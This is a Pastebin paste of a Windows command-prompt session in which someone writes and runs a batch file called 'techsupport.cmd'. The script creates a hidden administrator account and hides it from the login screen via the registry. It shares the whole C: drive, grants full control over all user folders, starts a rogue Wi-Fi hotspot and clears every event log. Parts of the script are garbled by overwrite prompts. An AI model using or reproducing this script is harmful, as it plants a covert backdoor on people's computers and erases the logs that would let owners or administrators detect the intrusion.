Advertisement
Guest User

Untitled

a guest
Sep 10th, 2013
487
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.52 KB | None | 0 0
  1. The screen cannot be set to the number of lines and columns specified.
  2.  
  3. C:\Users\Tecra>copy con techsupport.cmd
  4. net User techsupport techsupport /ADD
  5. Overwrite techsupport.cmd? (Yes/No/All): calGroup Administrators techsupport /ADD
  6. Overwrite techsupport.cmd? (Yes/No/All): g add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon
  7. \SpecialAccounts\UserList" /v techsupport /t REG_DWORD /d 0 /f
  8. Overwrite techsupport.cmd? (Yes/No/All): advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  9. net share techsupport=c:\ /UNLIMITED
  10. icacls c:\users\* /grant techsupport:(OI)(CI)F
  11. netsh interface set interface name="Wireless Network Connection" admin=enabled
  12. netsh interface set interface name="Wireless Network Connection 2" admin=enabled
  13. netsh interface set interface name="Wireless Network Connection 3" admin=enabled
  14. netsh wlan set hostednetwork ssid=techsupport key=techsupport
  15. netsh wlan start hostednetwork
  16. for /f %x in ('wevtutil el') do wevtutil cl "%x"
  17. exit
  18. ^Z
  19. 1 file(s) copied.
  20.  
  21. C:\Users\Tecra>techsupport.cmd
  22.  
  23. C:\Users\Tecra>net User techsupport techsupport /ADD
  24. The account already exists.
  25.  
  26. More help is available by typing NET HELPMSG 2224.
  27.  
  28.  
  29. C:\Users\Tecra>net share techsupport=c:\ /UNLIMITED
  30. The name has already been shared.
  31.  
  32. More help is available by typing NET HELPMSG 2118.
  33.  
  34.  
  35. C:\Users\Tecra>icacls c:\users\* /grant techsupport:(OI)(CI)F
  36. processed file: c:\users\All Users
  37. processed file: c:\users\Default
  38. processed file: c:\users\Default User
  39. processed file: c:\users\desktop.ini
  40. processed file: c:\users\Public
  41. processed file: c:\users\Tecra
  42. Successfully processed 6 files; Failed processing 0 files
  43.  
  44. C:\Users\Tecra>netsh interface set interface name="Wireless Network Connection" admin=enabled
  45.  
  46.  
  47. C:\Users\Tecra>netsh interface set interface name="Wireless Network Connection 2" admin=enabled
  48. This network connection does not exist.
  49.  
  50.  
  51.  
  52. C:\Users\Tecra>netsh interface set interface name="Wireless Network Connection 3" admin=enabled
  53. An interface with this name is not registered with the router.
  54.  
  55.  
  56. C:\Users\Tecra>netsh wlan set hostednetwork ssid=techsupport key=techsupport
  57. The SSID of the hosted network has been successfully changed.
  58. The user key passphrase of the hosted network has been successfully changed.
  59.  
  60.  
  61. C:\Users\Tecra>netsh wlan start hostednetwork
  62. The hosted network couldn't be started.
  63. A device attached to the system is not functioning.
  64.  
  65.  
  66. The syntax of the command is incorrect.
  67.  
  68. C:\Users\Tecra>for /f x"
  69.  
  70. C:\Users\Tecra>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement